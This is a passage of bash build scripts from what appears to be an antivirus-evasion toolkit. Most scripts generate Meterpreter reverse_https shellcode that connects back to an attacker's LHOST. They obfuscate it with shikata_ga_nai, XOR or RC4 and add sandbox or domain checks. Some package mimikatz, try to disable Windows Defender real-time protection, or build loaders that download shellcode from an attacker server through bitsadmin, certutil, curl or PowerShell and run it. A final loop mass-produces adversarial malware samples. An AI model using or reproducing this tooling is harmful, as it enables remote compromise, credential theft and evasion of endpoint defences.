source 44 | set_payload_source static_from_file input/sc_c.txt 45 | 46 | # set decoder and crypto key source 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # compile to exe file 57 | $win32_compiler -o output/calcfrompowersh_50xshikata_revhttps_win32.exe source/avet.c 58 | strip output/calcfrompowersh_50xshikata_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ 
calcfrompowersh_50xshikata_revhttps_win32.exe 67 | " 68 | -------------------------------------------------------------------------------- /build/build_checkdomain_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Checks the DNS domain the target is in, and exits without executing the payload if not in specified domain (test.testdomain.info). 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . 
build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | ## terminate program if target is not in specified domain 34 | add_evasion get_computer_domain test.testdomain.info 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/checkdomain_rc4_mimikatz.exe source/avet.c 68 | strip output/checkdomain_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 
77 | # Call generated executable on target like: 78 | # $ checkdomain_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/build_cpucores_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and perform get_cpu_cores sandbox evasion. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # exit if target has less than 2 cpu cores 40 | add_evasion get_cpu_cores 2 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | set_decoder none 47 | set_key_source no_data 48 | 49 | # set payload info source 50 | set_payload_info_source no_data 51 | 52 | # set shellcode binding technique 53 | set_payload_execution_method exec_shellcode 54 | 55 | # compile 56 | $win32_compiler -o output/cpucores_revhttps_win32.exe 
source/avet.c -lws2_32 57 | strip output/cpucores_revhttps_win32.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # Execute the following command: 65 | # $ cpucores_revhttps_win32.exe 66 | " 67 | -------------------------------------------------------------------------------- /build/build_disablewindefpsh_xorfromcmd_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Execute 64-bit shellcode. 6 | # Encrypts the payload with a dynamic XOR key, which needs to be provided via command line argument 2 to decrypt. 7 | # Attempts to disable Windows Defender's real-time protection via Powershell command "Set-MpPreference -DisableRealtimeMonitoring $true". 8 | #DESCRIPTION_END 9 | 10 | 11 | # print AVET logo 12 | cat banner.txt 13 | 14 | # include script containing the compiler var $win64_compiler 15 | # you can edit the compiler in build/global_win64.sh 16 | # or enter $win64_compiler="mycompiler" here 17 | . build/global_win64.sh 18 | 19 | # import feature construction interface 20 | . build/feature_construction.sh 21 | 22 | # import global default lhost and lport values from build/global_connect_config.sh 23 | . 
build/global_connect_config.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # override connect-back settings here, if necessary 28 | LPORT=$GLOBAL_LPORT 29 | LHOST=$GLOBAL_LHOST 30 | # generate key file 31 | generate_key preset aabbccddee input/key_raw.txt 32 | # enable debug output 33 | enable_debug_print 34 | #CONFIGURATION_END 35 | 36 | 37 | # make meterpreter reverse payload 38 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -f raw --platform Windows > input/sc_raw.txt 39 | 40 | # try to disable Windows Defender's real-time protection via powershell 41 | set_command_source static_from_here 'Set-MpPreference -DisableRealtimeMonitoring $true' 42 | set_command_exec exec_via_powershell 43 | 44 | 45 | 46 | # encrypt payload 47 | encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt 48 | 49 | # convert to c array format for static include 50 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 51 | 52 | # set encrypted payload as source 53 | set_payload_source static_from_file input/scenc_c.txt 54 | 55 | # set decoder and key source 56 | # key is retrieved in hex format from command line 57 | set_decoder xor 58 | set_key_source from_command_line_hex 59 | 60 | # set payload info source 61 | set_payload_info_source no_data 62 | 63 | # set shellcode binding technique 64 | set_payload_execution_method exec_shellcode64 65 | 66 | # call make_avet, compile 67 | $win64_compiler -o output/disablewindefpsh_xorfromcmd_revhttps_win64.exe source/avet.c 68 | strip output/disablewindefpsh_xorfromcmd_revhttps_win64.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | echo " 74 | # The decryption key is aabbccddee if it has not been changed. 
75 | # Call on target like: 76 | # disablewindefpsh_xorfromcmd_revhttps_win64.exe first [decryption key] 77 | " 78 | -------------------------------------------------------------------------------- /build/build_dkmc_downloadexecshc_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # +++ WARNING +++ 6 | # Currently, the BMP shellcode does not execute properly! It seems that DKMC generates invalid shellcode. 7 | 8 | # example script for building executables and DKMC payload 9 | # which is nice, this is hiding the shellcode in a valid bitmap file 10 | # DKMC has to be in a directory side by side to avet eg. ~/tools/avet ~/tools/DKMC for running this script 11 | # for more look here https://govolution.wordpress.com/2018/03/02/download-exec-poc-and-dkmc/ 12 | #DESCRIPTION_END 13 | 14 | 15 | # print AVET logo 16 | cat banner.txt 17 | 18 | # include script containing the compiler var $win32_compiler 19 | # you can edit the compiler in build/global_win32.sh 20 | # or enter $win32_compiler="mycompiler" here 21 | . build/global_win32.sh 22 | 23 | # import feature construction interface 24 | . build/feature_construction.sh 25 | 26 | # import global default lhost and lport values from build/global_connect_config.sh 27 | . 
build/global_connect_config.sh 28 | 29 | 30 | #CONFIGURATION_START 31 | # override connect-back settings here, if necessary 32 | LPORT=$GLOBAL_LPORT 33 | LHOST=$GLOBAL_LHOST 34 | # no command preexec 35 | set_command_source no_data 36 | set_command_exec no_command 37 | # don't enable debug output because printing the whole bmp payload takes a lot of time 38 | #enable_debug_print 39 | #CONFIGURATION_END 40 | 41 | 42 | # make meterpreter reverse payload, format correct for DKMC and run DKMC for making the bitmap file 43 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 44 | cd ../DKMC 45 | printf "gen\nset output ../avet/output/sc.bmp\nset shellcode %s\nrun\nexit\nexit\n" `../avet/tools/sh_format/sh_format input/sc_c.txt | tr -d "\n" | tr -d ";" | tr -d "\""` | python dkmc.py 46 | cd ../avet 47 | 48 | # set shellcode source 49 | set_payload_source download_socket 50 | 51 | # set decoder and key source 52 | set_decoder none 53 | set_key_source no_data 54 | 55 | # set payload info source 56 | set_payload_info_source no_data 57 | 58 | # set shellcode binding technique 59 | set_payload_execution_method exec_shellcode 60 | 61 | # compile 62 | $win32_compiler -s -o output/dkmc_downloadexecshc_revhttps_win32.exe source/avet.c -lwsock32 -lws2_32 63 | strip output/dkmc_downloadexecshc_revhttps_win32.exe 64 | 65 | # cleanup 66 | cleanup_techniques 67 | 68 | 69 | echo " 70 | # The generated shellcode must be hosted on a HTTP server. 71 | # Call your executable like: 72 | # dkmc_downloadexecshc_revhttps_win32.exe http://yourserver/sc.bmp 73 | 74 | # The executable will then download the shellcode to memory via sockets (no file is dropped on disk). 75 | # Next, the shellcode is executed. 
76 | " 77 | -------------------------------------------------------------------------------- /build/build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Downloads and executes 64-bit shellcode, using bitsadmin. Applies metasploit XOR encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win64_compiler 13 | # you can edit the compiler in build/global_win64.sh 14 | # or enter $win64_compiler="mycompiler" here 15 | . build/global_win64.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print to_file C:/users/public/avetdbg.txt 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload 37 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -b '\x00' -f raw --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_bitsadmin 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode64 51 | 52 | # enable debug output 53 | enable_debug_print to_file C:/users/public/avetdbg.txt 54 | 55 | # compile 56 | $win64_compiler -o output/downloadbitsadmin_mtrprtrxor_revhttps_win64.exe source/avet.c -lwsock32 -lws2_32 57 | strip 
output/downloadbitsadmin_mtrprtrxor_revhttps_win64.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # The generated msf shellcode file needs to be hosted on a HTTP server 65 | # Call the executable like: 66 | # $ downloadbitsadmin_mtrprtrxor_revhttps_win64.exe http://yourserver/thepayload.bin 67 | # Downloads the payload to disk, then reads the file and executes the payload. 68 | " 69 | -------------------------------------------------------------------------------- /build/build_downloadbitsadmin_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # build the .exe file that loads the payload from a given text file 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . 
build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print to_file C:/users/public/avetdbg.txt 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f raw -a x86 -b "\x00" --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_bitsadmin 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # compile to exe file 53 | $win32_compiler -o output/downloadbitsadmin_revhttps_win32.exe source/avet.c 54 | strip output/downloadbitsadmin_revhttps_win32.exe 55 | 56 | # cleanup 57 | cleanup_techniques 58 | 59 | 60 | echo " 61 | # The generated msf shellcode must be hosted on a HTTP server. 62 | # Call your executable like: 63 | # $ downloadbitsadmin_revhttps_win32.exe http://myserver/thepayload.bin 64 | 65 | # The executable will then download the file via bitsadmin and drop it on the target's disk. 66 | # The downloaded shellcode is then read from the file and executed. 67 | " 68 | -------------------------------------------------------------------------------- /build/build_downloadcertutil_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata, download your payload via certutil. 
6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | # additionaly to the avet encoder, further encoding should be used 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f raw -a x86 -b "\x00" --platform Windows > output/thepayload.bin 39 | 40 | # set shellcode source 41 | set_payload_source download_certutil 42 | 43 | # set decoder and key source 44 | set_decoder none 45 | set_key_source no_data 46 | 47 | # set payload info source 48 | set_payload_info_source no_data 49 | 50 | # set shellcode binding technique 51 | set_payload_execution_method exec_shellcode 52 | 53 | # compile to exe file 54 | $win32_compiler -o output/downloadcertutil_revhttps_win32.exe source/avet.c 55 | strip output/downloadcertutil_revhttps_win32.exe 56 | 57 | # cleanup 58 | cleanup_techniques 59 | 60 | 61 | echo " 62 | # The generated msf payload needs to be hosted on a HTTP server 63 | # Call your payload like: 64 | # $ downloadcertutil_revhttps_win32.exe http://myserver/thepayload.bin 65 | 66 | # The executable will download and drop the payload as a file on the target's disk. 
67 | # It will then execute the shellcode given in the file. 68 | " 69 | -------------------------------------------------------------------------------- /build/build_downloadcurl_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Downloads and executes 64-bit shellcode, using curl. Applies metasploit XOR encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win64_compiler 13 | # you can edit the compiler in build/global_win64.sh 14 | # or enter $win64_compiler="mycompiler" here 15 | . build/global_win64.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print to_file C:/users/public/avetdbg.txt 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload 37 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -b '\x00' -f raw --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_curl 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode64 51 | 52 | # enable debug output 53 | enable_debug_print to_file C:/users/public/avetdbg.txt 54 | 55 | # compile 56 | $win64_compiler -o output/downloadcurl_mtrprtrxor_revhttps_win64.exe 
source/avet.c -lwsock32 -lws2_32 57 | strip output/downloadcurl_mtrprtrxor_revhttps_win64.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # The generated msf shellcode file needs to be hosted on a HTTP server 65 | # Call the executable like: 66 | # $ downloadcurl_mtrprtrxor_revhttps_win64.exe http://yourserver/thepayload.bin 67 | # Downloads the payload to disk, then reads the file and executes the payload. 68 | " 69 | -------------------------------------------------------------------------------- /build/build_downloadiexplorer_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Download the payload via internet explorer and execute. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . 
build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 2 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # Apply AVET encoding 40 | encode_payload avet input/sc_c.txt output/scenc_raw.txt 41 | 42 | # set shellcode source 43 | set_payload_source download_internet_explorer 44 | 45 | # set decoder and key source 46 | # AVET decoder requires no key 47 | set_decoder avet 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # compile 57 | $win32_compiler -o output/downloadiexplorer_revhttps_win32.exe source/avet.c 58 | strip output/downloadiexplorer_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # The generated msf shellcode file needs to be hosted on a HTTP server. 66 | # Call the generated executable like: 67 | # $ downloadiexplorer_revhttps_win32.exe http://myserver/scenc_raw.txt 68 | 69 | # The executable will then download the shellcode file via internet explorer and drop the file on disk. 70 | # The shellcode is then read from the file and executed. 
71 | " 72 | -------------------------------------------------------------------------------- /build/build_downloadpsh_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # build the .exe file that loads the payload from a given text file 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f raw -a x86 -b "\x00" --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_powershell 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # compile to exe file 53 | $win32_compiler -o output/downloadpsh_revhttps_win32.exe source/avet.c 54 | strip output/downloadpsh_revhttps_win32.exe 55 | 56 | # cleanup 57 | cleanup_techniques 58 | 59 | 60 | echo " 61 | # The generated msf shellcode must be hosted on a 
HTTP server. 62 | # Call your executable like: 63 | # $ downloadpsh_revhttps_win32.exe http://myserver/thepayload.bin 64 | # The executable will then download the file via powershell and drop it on the target's disk. 65 | # The downloaded shellcode is then read from the file and executed. 66 | " 67 | -------------------------------------------------------------------------------- /build/build_downloadsocket_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Downloads and executes 64-bit shellcode, using sockets. Applies metasploit XOR encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win64_compiler 13 | # you can edit the compiler in build/global_win64.sh 14 | # or enter $win64_compiler="mycompiler" here 15 | . build/global_win64.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . 
build/global_connect_config.sh 22 | 23 | #CONFIGURATION_START 24 | # override connect-back settings here, if necessary 25 | LPORT=$GLOBAL_LPORT 26 | LHOST=$GLOBAL_LHOST 27 | # no command preexec 28 | set_command_source no_data 29 | set_command_exec no_command 30 | # enable debug output 31 | enable_debug_print 32 | #CONFIGURATION_END 33 | 34 | 35 | # make meterpreter reverse payload 36 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -b '\x00' -f raw --platform Windows > output/thepayload.bin 37 | 38 | # set shellcode source 39 | set_payload_source download_socket 40 | 41 | # set decoder and key source 42 | set_decoder none 43 | set_key_source no_data 44 | 45 | # set payload info source 46 | set_payload_info_source no_data 47 | 48 | # set shellcode binding technique 49 | set_payload_execution_method exec_shellcode64 50 | 51 | # compile 52 | $win64_compiler -o output/downloadsocket_mtrprtrxor_revhttps_win64.exe source/avet.c -lwsock32 -lws2_32 53 | strip output/downloadsocket_mtrprtrxor_revhttps_win64.exe 54 | 55 | # cleanup 56 | cleanup_techniques 57 | 58 | 59 | echo " 60 | # The generated msf shellcode file needs to be hosted on a HTTP server 61 | # Call the executable like: 62 | # $ downloadsocket_mtrprtrxor_revhttps_win64.exe http://yourserver/thepayload.bin 63 | # The executable downloads the shellcode into memory (no file is dropped on disk) and executes it. 64 | " 65 | -------------------------------------------------------------------------------- /build/build_downloadsocket_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Download the shellcode via sockets. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . 
build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -b '\x00' -f raw -a x86 --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_socket 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # compile to exe file 53 | $win32_compiler -o output/downloadsocket_revhttps_win32.exe source/avet.c -lwsock32 -lws2_32 54 | strip output/downloadsocket_revhttps_win32.exe 55 | 56 | # cleanup 57 | cleanup_techniques 58 | 59 | echo " 60 | # The generated msf payload needs to be hosted on a HTTP server 61 | # Call your executable like: 62 | # $ downloadsocket_revhttps_win32.exe http://yourserver/thepayload.bin 63 | # The executable will then download, read the file into memory via sockets (no file is dropped on disk) and finally execute the downloaded shellcode. 
64 | " 65 | -------------------------------------------------------------------------------- /build/build_dynamicfromfile_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # build the .exe file that loads the payload from a given text file 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | # additionaly to the avet encoder, further encoding should be used 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -b '\x00' -f raw -a x86 --platform Windows > output/thepayload.bin 39 | 40 | # set shellcode source 41 | set_payload_source dynamic_from_file 42 | 43 | # set decoder and key source 44 | set_decoder none 45 | set_key_source no_data 46 | 47 | # set payload info source 48 | set_payload_info_source no_data 49 | 50 | # set shellcode binding technique 51 | set_payload_execution_method exec_shellcode 52 | 53 | # compile to exe file 54 | $win32_compiler -o output/dynamicfromfile_revhttps_win32.exe source/avet.c 55 | strip output/dynamicfromfile_revhttps_win32.exe 56 | 57 | # cleanup 58 | 
cleanup_techniques 59 | 60 | 61 | echo " 62 | # Call the generated executable like: 63 | # $ dynamicfromfile_revhttps_win32.exe thepayload.bin 64 | " 65 | -------------------------------------------------------------------------------- /build/build_eval_adversarial_dos.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . build/feature_construction.sh 13 | 14 | 15 | 16 | FILES="input/malware-filtered2/*" 17 | N=3 18 | practical_manipulation="full_dos" 19 | population_size=100 20 | section_size=5 21 | 22 | for f in $FILES 23 | do 24 | ((i=i%N)); ((i++==0)) && wait 25 | 26 | ( cp $f output/ 27 | 28 | # generate adversarial example 29 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 30 | 31 | # cleanup 32 | rm output/$(basename "$f") 33 | # cleanup_techniques 34 | ) & 35 | done 36 | 37 | wait -------------------------------------------------------------------------------- /build/build_eval_adversarial_extend.sh: -------------------------------------------------------------------------------- 1 | 